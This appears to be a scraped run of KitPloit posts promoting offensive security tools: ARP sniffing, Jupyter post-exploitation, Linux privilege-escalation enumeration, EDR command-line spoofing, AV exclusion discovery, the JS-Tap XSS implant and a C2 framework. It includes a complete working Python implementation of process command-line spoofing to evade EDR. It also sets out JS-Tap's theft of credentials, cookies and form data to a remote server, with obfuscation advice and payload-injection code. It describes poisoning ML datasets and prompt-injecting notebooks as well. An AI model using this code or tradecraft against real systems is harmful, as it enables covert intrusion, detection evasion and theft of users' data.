The tool can detect hosts without making noise on the air by processing ARP frames in passive mode; a minimal Scapy sketch of the idea follows the example below.

      caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

      [+] Host discovery using Passive ARP

      --------------------------------------------------
      [+] Detected ARP Reply
      [*] ARP Reply for IP: 192.168.1.88
      [*] MAC Address: 00:00:0c:07:ac:c8
      --------------------------------------------------
      [+] Detected ARP Reply
      [*] ARP Reply for IP: 192.168.1.40
      [*] MAC Address: 00:0c:29:c5:82:81
      --------------------------------------------------
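
The whole passive-ARP idea fits in a few lines of Scapy. A minimal sketch for illustration (this is not Above's actual code, just the concept it builds on):

```python
# Minimal Scapy sketch of passive ARP host discovery: transmit nothing, just
# listen for ARP replies (op == 2, "is-at") and record who answers for what.
from scapy.all import ARP, sniff

def on_arp(pkt):
    if pkt.haslayer(ARP) and pkt[ARP].op == 2:        # op 2 = ARP reply
        print(f"[+] ARP Reply for IP: {pkt[ARP].psrc}")
        print(f"[*] MAC Address: {pkt[ARP].hwsrc}")

sniff(filter="arp", prn=on_arp, store=0, timeout=60)  # store=0: don't buffer
```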

      Outro

      I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

      By: Zion3R β€” May 21st 2024 at 12:30

      V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

      User Stories

      • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
      • As a Red Teamer, you know that some browser-based actions will be visibile to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
      • As an AI Red Teamer, you understand academic algorthmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. with V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
      • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

      Usage

      Initial Setup

      1. pip install vger
      2. vger --help

Currently, vger interactive has the most functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by name in non-interactive format with vger <module>. List available modules with vger --help.

      Commands

      Once a connection is established, users drop into a nested set of menus.

The top level menu is:
β€’ Reset: Configure a different host.
β€’ Enumerate: Utilities to learn more about the host.
β€’ Exploit: Utilities to perform direct action and manipulation of the host and artifacts.
β€’ Persist: Utilities to establish persistence mechanisms.
β€’ Export: Save output to a text file.
β€’ Quit: No one likes quitters.

These menus contain the following functionality:
β€’ List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code.
β€’ Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in the runtime of the notebook.
β€’ Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root, on a user-specified port with a user-specified password.
β€’ Check History: See ipython commands recently run in the target notebook.
β€’ Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal.
β€’ List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /.
β€’ Upload file: Upload a file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension.
β€’ Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory).
β€’ Find models: Find models based on common file formats.
β€’ Download models: Download discovered models.
β€’ Snoop: Monitor notebook execution and results until timeout.
β€’ Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.

      Experimental

With pip install vger[ai] you'll get LLM-generated summaries of notebooks in the target environment. These are meant as rough translations for non-DS/AI folks to quickly triage whether (or which) notebooks are worth investigating further.

There was an inherent tradeoff between model size and ability, and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt-injecting their notebooks ("these are not the droids you're looking for").

      Examples



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

      By: Zion3R β€” May 19th 2024 at 00:42


      First, a couple of useful oneliners ;)

      wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
      curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

      Note that since version 2.10 you can serve the script to other hosts with the -S flag!


      linux-smart-enumeration

      Linux enumeration tools for pentesting and CTFs

      This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.

      What is it?

      This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

      From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while executing all the other tests, so you save some time. By default it monitors for 1 minute, but you can choose the watch time with the -p parameter.

      It has 3 levels of verbosity so you can control how much information you see.

      In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

      By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

      How to use it?

      The idea is to get the information gradually.

      First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with.

      If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find it useful to pipe through ./lse.sh -l2 | less -r.

      You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

      Use: ./lse.sh [options]

      OPTIONS
      -c Disable color
      -i Non interactive mode
      -h This help
      -l LEVEL Output verbosity level
      0: Show highly important results. (default)
      1: Show interesting results.
      2: Show all gathered information.
      -s SELECTION Comma separated list of sections or tests to run. Available
      sections:
      usr: User related tests.
      sud: Sudo related tests.
      fst: File system related tests.
      sys: System related tests.
      sec: Security measures related tests.
ret: Recurrent tasks (cron, timers) related tests.
      net: Network related tests.
      srv: Services related tests.
      pro: Processes related tests.
      sof: Software related tests.
      ctn: Container (docker, lxc) related tests.
      cve: CVE related tests.
      Specific tests can be used with their IDs (i.e.: usr020,sud)
      -e PATHS Comma separated list of paths to exclude. This allows you
      to do faster scans at the cost of completeness
      -p SECONDS Time that the process monitor will spend watching for
      processes. A value of 0 will disable any watch (default: 60)
      -S Serve the lse.sh script in this host so it can be retrieved
      from a remote host.

      Is it pretty?

      Usage demo

      Also available in webm video


      Level 0 (default) output sample


      Level 1 verbosity output sample


      Level 2 verbosity output sample


      Examples

      Direct execution oneliners

      bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
      bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line

      By: Zion3R β€” May 11th 2024 at 12:30


LOLSpoof is an interactive shell program that automatically spoofs the command line arguments of the spawned process. Just call your incriminating-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clean.


      Why

The process command line is a heavily monitored piece of telemetry, thoroughly inspected by AV/EDRs, SOC analysts and threat hunters.

      How

      1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
      2. Spawns that suspended LOLBin with the spoofed command line
      3. Gets the remote PEB address
      4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
      5. Gets the address of the command line unicode buffer
      6. Overrides the fake command line with the real one
      7. Resumes the main thread
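
To make the steps concrete, here is a hypothetical Python/ctypes sketch of the same technique on 64-bit Windows (LOLSpoof itself is written in Nim; the PEB and RTL_USER_PROCESS_PARAMETERS offsets below are the well-known x64 values, and this is an illustration, not the tool's implementation):

```python
# Hypothetical sketch of command-line spoofing via the remote PEB (x64 only).
# An illustration of the numbered steps above, not LOLSpoof's Nim code.
import ctypes
from ctypes import wintypes

CREATE_SUSPENDED = 0x00000004

class STARTUPINFO(ctypes.Structure):
    _fields_ = [("cb", wintypes.DWORD), ("lpReserved", wintypes.LPWSTR),
                ("lpDesktop", wintypes.LPWSTR), ("lpTitle", wintypes.LPWSTR),
                ("dwX", wintypes.DWORD), ("dwY", wintypes.DWORD),
                ("dwXSize", wintypes.DWORD), ("dwYSize", wintypes.DWORD),
                ("dwXCountChars", wintypes.DWORD), ("dwYCountChars", wintypes.DWORD),
                ("dwFillAttribute", wintypes.DWORD), ("dwFlags", wintypes.DWORD),
                ("wShowWindow", wintypes.WORD), ("cbReserved2", wintypes.WORD),
                ("lpReserved2", ctypes.c_void_p), ("hStdInput", wintypes.HANDLE),
                ("hStdOutput", wintypes.HANDLE), ("hStdError", wintypes.HANDLE)]

class PROCESS_INFORMATION(ctypes.Structure):
    _fields_ = [("hProcess", wintypes.HANDLE), ("hThread", wintypes.HANDLE),
                ("dwProcessId", wintypes.DWORD), ("dwThreadId", wintypes.DWORD)]

class PROCESS_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [("Reserved1", ctypes.c_void_p), ("PebBaseAddress", ctypes.c_void_p),
                ("Reserved2", ctypes.c_void_p * 2), ("UniqueProcessId", ctypes.c_void_p),
                ("Reserved3", ctypes.c_void_p)]

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
ntdll = ctypes.WinDLL("ntdll")

def spawn_spoofed(lolbin: str, real_args: str) -> None:
    real_line = f"{lolbin} {real_args}"
    fake_line = f"{lolbin} " + " " * len(real_args)          # 1. padded fake line
    si, pi = STARTUPINFO(), PROCESS_INFORMATION()
    si.cb = ctypes.sizeof(si)
    cmd = ctypes.create_unicode_buffer(fake_line)
    if not kernel32.CreateProcessW(None, cmd, None, None, False,
                                   CREATE_SUSPENDED, None, None,
                                   ctypes.byref(si), ctypes.byref(pi)):
        raise ctypes.WinError(ctypes.get_last_error())       # 2. suspended spawn

    pbi = PROCESS_BASIC_INFORMATION()                        # 3. remote PEB address
    ntdll.NtQueryInformationProcess(pi.hProcess, 0, ctypes.byref(pbi),
                                    ctypes.sizeof(pbi), None)

    params = ctypes.c_void_p()                               # 4. ProcessParameters
    n = ctypes.c_size_t()
    kernel32.ReadProcessMemory(pi.hProcess,
                               ctypes.c_void_p(pbi.PebBaseAddress + 0x20),
                               ctypes.byref(params), 8, ctypes.byref(n))

    buf = ctypes.c_void_p()                                  # 5. CommandLine buffer
    kernel32.ReadProcessMemory(pi.hProcess,
                               ctypes.c_void_p(params.value + 0x70 + 0x8),
                               ctypes.byref(buf), 8, ctypes.byref(n))

    real = ctypes.create_unicode_buffer(real_line)           # 6. overwrite fake line
    kernel32.WriteProcessMemory(pi.hProcess, buf, real,
                                ctypes.sizeof(real), ctypes.byref(n))

    kernel32.ResumeThread(pi.hThread)                        # 7. resume main thread

spawn_spoofed("powershell.exe", "-w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA")
```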

      Opsec considerations

Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry:
1. Creation of a suspended process
2. The new process has trailing spaces (but it's really easy to use a repeated character or even random data instead)
3. Writing to the spawned process with WriteProcessMemory

      Build

      Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

      nimble install winim

      Known issue

Programs that clear or change the previously printed console messages (such as timeout.exe 10) break the program. When such commands are employed, you'll need to restart the console. I don't know how to fix that yet; open to suggestions.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      BadExclusionsNWBO - An Evolution From BadExclusions To Identify Folder Custom Or Undocumented Exclusions On AV/EDR

      By: Zion3R β€” May 9th 2024 at 12:30


BadExclusionsNWBO is an evolution of BadExclusions, designed to identify custom or undocumented folder exclusions on AV/EDR.

How does it work?

BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe in the same folder as BadExclusionsNWBO.exe.

Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or fewer, the folder has an exclusion; otherwise, the folder is not excluded.


      Original idea?

Since the release of BadExclusions I've been thinking about how to achieve the same results without creating as much noise. The solution came from another tool: https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.

If you download Probatorum-EDR-Userland-Hook-Checker and run it inside a regular folder and then in a folder with a specific type of exclusion, you will notice a huge difference. All the information is in the Probatorum repository.

      Requirements

Each vendor applies exclusions in a different way. In order to get the list of folder exclusions, a specific type of exclusion should be made. Not all types of exclusions, and not all vendors, remove the hooks when they exclude a folder.

The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write the Hook_Checker file and collect the results.

      EDR Demo

      https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application

      By: Zion3R β€” May 4th 2024 at 12:30


      JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


      Changelogs

      Major changes are documented in the project Announcements:
      https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

      Demo

      You can read the original blog post about JS-Tap here:
https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

      Short demo from ShmooCon of JS-Tap version 1:
      https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

      Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
      https://youtu.be/aWvNLJnqObQ?t=11719

      A demo can also be seen in this webinar:
      https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

      Upgrade warning

      I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

      Introduction

      JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

      The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

      Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

The example JS-Tap payload is contained in the telemlib.js file in the payloads directory; however, any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using it in an engagement, strongly consider changing the naming of endpoints, stripping comments, and heavily obfuscating the payload.

      Make sure you review the configuration section below carefully before using on a publicly exposed server.

      Data Collected

      • Client IP address, OS, Browser
      • User inputs (credentials, etc.)
      • URLs visited
      • Cookies (that don't have httponly flag set)
      • Local Storage
      • Session Storage
      • HTML code of pages visited (if feature enabled)
      • Screenshots of pages visited
      • Copy of Form Submissions
      • Copy of XHR API calls (if monkeypatch feature enabled)
        • Endpoint
        • Method (GET, POST, etc.)
        • Headers set
        • Request body and response body
      • Copy of Fetch API calls (if monkeypatch feature enabled)
        • Endpoint
        • Method (GET, POST, etc.)
        • Headers set
        • Request body and response body

Note: the ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only the Fetch API can currently be copied.

      Operating Modes

The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function; search for the window.taperMode variable.

      Trap Mode

Trap mode is typically the mode you would use as an XSS payload. Execution of XSS payloads is often fleeting: the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run for a long time or you won't collect useful data.

      Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

      In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

      Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

Note: I've had good luck using trap mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. the current location). The trap will be set when the user visits the login page, and they'll hopefully continue into the authenticated portions of the application inside the iframe trap.

      A user refreshing the page will generally break/escape the iframe trap.

      Implant Mode

      Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

      A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

      Installation and Start

Requires python3. A large number of dependencies are required for the jsTapServer, so you are highly encouraged to use Python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

      Example:

      mkdir jsTapEnvironment
      python3 -m venv jsTapEnvironment
      source jsTapEnvironment/bin/activate
      cd jsTapEnvironment
      git clone https://github.com/hoodoer/JS-Tap
      cd JS-Tap
      pip3 install -r requirements.txt

      run in debug/single thread mode:
      python3 jsTapServer.py

      run with gunicorn multithreaded (production use):
      ./jstapRun.sh

      A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

      If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

      Note that on Mac I also had to install libmagic outside of python.

      brew install libmagic

Playing with JS-Tap locally is fine, but to use it in a proper engagement you'll need to run JS-Tap on a publicly accessible VPS and set up JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

      Configuration

      JS-Tap Server Configuration

      Debug/Single thread config

      If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

      Proxy Mode

For production use, JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like Let's Encrypt. The easiest way to deploy this is to let NGINX act as a front-end to JS-Tap and handle the Let's Encrypt cert, then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

If you set proxyMode to true, the JS-Tap server will run in HTTP mode and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.

      When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.
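
The client-IP selection described above might look like this hypothetical Flask fragment (JS-Tap's server appears to be Flask-based given the app.run() line shown later, but this is an illustration of the proxyMode behavior, not its actual code):

```python
# Hypothetical illustration of the proxyMode client-IP logic described above.
from flask import Flask, request

app = Flask(__name__)
PROXY_MODE = True  # stand-in for JS-Tap's proxyMode setting

def client_ip() -> str:
    if PROXY_MODE and "X-Forwarded-For" in request.headers:
        # NGINX sets this header; the first entry is the real client address
        return request.headers["X-Forwarded-For"].split(",")[0].strip()
    return request.remote_addr  # direct mode: the socket's source IP
```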

      Data Directory

The dataDirectory parameter tells JS-Tap which directory to use for the SQLite database and the loot directory. Not all "loot" is stored in the database; screenshots and scraped HTML files in particular are not.

      Server Port

      To change the server port configuration see the last line of jsTapServer.py

      app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

      Gunicorn Production Configuration

      Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

      A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGNIX to also use multiple processes so you don't bottleneck on the proxy itself.

At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use the number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX, I typically set worker_processes auto; in its configuration.

      Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

The gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
      openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

      telemlib.js Configuration

      These configuration variables are in the initGlobals() function.

      JS-Tap Server Location

      You need to configure the payload with the URL of the JS-Tap server it will connect back to.

      window.taperexfilServer = "https://127.0.0.1:8444";

      Mode

Set to either trap or implant. This is set with the variable:

      window.taperMode = "trap";
      or
      window.taperMode = "implant";

      Trap Mode Starting Page

      Only needed for trap mode. See explanation in Operating Modes section above.
      Sets the page the user starts on when the iFrame trap is set.

      window.taperstartingPage = "http://targetapp.com/somestartpage";

      If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

      window.taperstartingPage = window.location.href;

      Client Tag

Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of which payload was loaded. Remember that the entire /payloads directory is served; you can have multiple JS-Tap payloads configured with different modes, start pages, and client tags.

This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Set up multiple payloads, each with the appropriate configuration for the application it's being used against, and add a tag indicating which app the client is running.

      window.taperTag = 'whatever';

      Custom Payload Tasks

Used to set whether clients check for Custom Payload tasks, and how often they check. The jitter settings let you optionally set a floor and ceiling modifier. A random value between these two numbers is picked and added to the check delay. Set both to 0 for no jitter.

      window.taperTaskCheck        = true;
      window.taperTaskCheckDelay = 5000;
      window.taperTaskJitterBottom = -2000;
      window.taperTaskJitterTop = 2000;
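Illustratively, the effective delay works out as in this small Python sketch (a translation of the behavior described above, not the payload's actual JavaScript):

import random

taskCheckDelay = 5000  # base delay in ms
jitterBottom = -2000   # floor modifier in ms
jitterTop = 2000       # ceiling modifier in ms

def next_check_delay():
    # A random value between the floor and ceiling is added to the base delay.
    return taskCheckDelay + random.uniform(jitterBottom, jitterTop)

print(next_check_delay())  # e.g. somewhere between 3000 and 7000 ms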

      Exfiltrate HTML

      true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

      window.taperexfilHTML = true;

      Copy Form Submissions

      true/false setting on whether to intercept a copy of all form posts.

      window.taperexfilFormSubmissions = true;

      MonkeyPatch APIs

Enable monkeypatching of the XHR and Fetch APIs. This works in trap mode; in implant mode, only the Fetch API is monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will rewrite the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Note that jQuery-based network calls will be captured via the XHR API, which jQuery uses under the hood for network calls.

      window.monkeyPatchAPIs = true;
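For readers unfamiliar with the technique, here is a language-agnostic illustration of monkeypatching in Python: wrap an existing networking function at runtime so its calls can be observed (an analogue of what telemlib.js does to XHR/Fetch, not its actual code):

import requests

_original_get = requests.get  # keep a reference to the real function

def tapped_get(url, **kwargs):
    print("[tap] GET", url)  # observe the outgoing call
    response = _original_get(url, **kwargs)
    print("[tap] ->", response.status_code)  # observe the result
    return response

requests.get = tapped_get  # rewrite the API in place at runtime
# requests.get("https://example.com")  # callers are now tapped transparently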

      Screenshot after API calls

By default, JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made; these API calls are often used to retrieve new data to display. Two settings are offered: one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call, JS-Tap will capture the new screenshot.

      window.postApiCallScreenshot = true;
      window.screenshotDelay = 1000;

      JS-Tap Portal

      Login with the admin credentials provided by the server script on startup.

      Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

      The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

Each client has an 'x' button (near the star button). This allows you to delete the session for that client; if they're sending junk or useless data, you can prevent that client from submitting future data.

When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issued, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session here.

      Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

      The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

      Custom Payloads

      Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

      [{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]

      The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

      In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate at which a client checks for custom payload tasks is variable, and is set in the main JS-Tap payload configuration. That rate can also be changed at runtime with a custom payload (by calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

      The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

To run a payload on a single client, use the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

      Tools

      A few tools are included in the tools subdirectory.

      clientSimulator.py

      A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

At the top of the script is a numClients variable; set it to how many clients you want to simulate. The script will spawn a thread for each, retrieve a client session, and send data simulating a client.

      numClients = 50

      You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

      apiServer = "https://127.0.0.1:8444"
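If you want a feel for what the stress test involves, here is a minimal thread-per-client sketch in the same spirit (the /register and /event endpoints are hypothetical placeholders, not clientSimulator.py's actual API paths):

import threading
import requests

numClients = 50
apiServer = "https://127.0.0.1:8444"

def simulate_client():
    s = requests.Session()
    s.verify = False  # accept the self-signed cert in test setups
    try:
        s.post(apiServer + "/register")  # hypothetical session retrieval
        for _ in range(10):
            s.post(apiServer + "/event", json={"type": "heartbeat"})  # hypothetical loot submission
    except requests.RequestException:
        pass  # server unreachable; fine for a sketch

threads = [threading.Thread(target=simulate_client) for _ in range(numClients)]
for t in threads:
    t.start()
for t in threads:
    t.join()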

      JS-Tap run using gunicorn scales quite well.

      MonkeyPatchApp

A simple app used for testing XHR/Fetch monkeypatching, but it also gives you a basic application to test the payload against in general.

      Run with:

      python3 monkeyPatchLab.py

      By default this will start the application running on:

      https://127.0.0.1:8443

      Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js

function injectPayload()
{
    document.head.appendChild(Object.assign(document.createElement('script'),
        {src: 'https://127.0.0.1:8444/lib/telemlib.js', type: 'text/javascript'}));
}

      formParser.py

An abandoned tool, but a good start on analyzing HTML for forms and parsing out their parameters. It was intended to help automatically generate JavaScript payloads to target form posts.

      You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

      generateIntelReport.py

No longer working; it was used before JS-Tap had a web UI. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons; most of it is stored in the database, with the exception of exfiltrated HTML code and screenshots.

      Contact

      @hoodoer
      hoodoer@bitwisemunitions.dev



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

      By: Zion3R β€” May 2nd 2024 at 12:30


      The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

      C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

      Reverse shells support:

      1. Reverse TCP
      2. Reverse HTTP
      3. Reverse HTTPS (configure it behind an LB)
      4. Telegram C2

      Demo

      C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
      Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
      Telegram C2: https://youtu.be/WLQtF4hbCKk

      Key Features

      πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
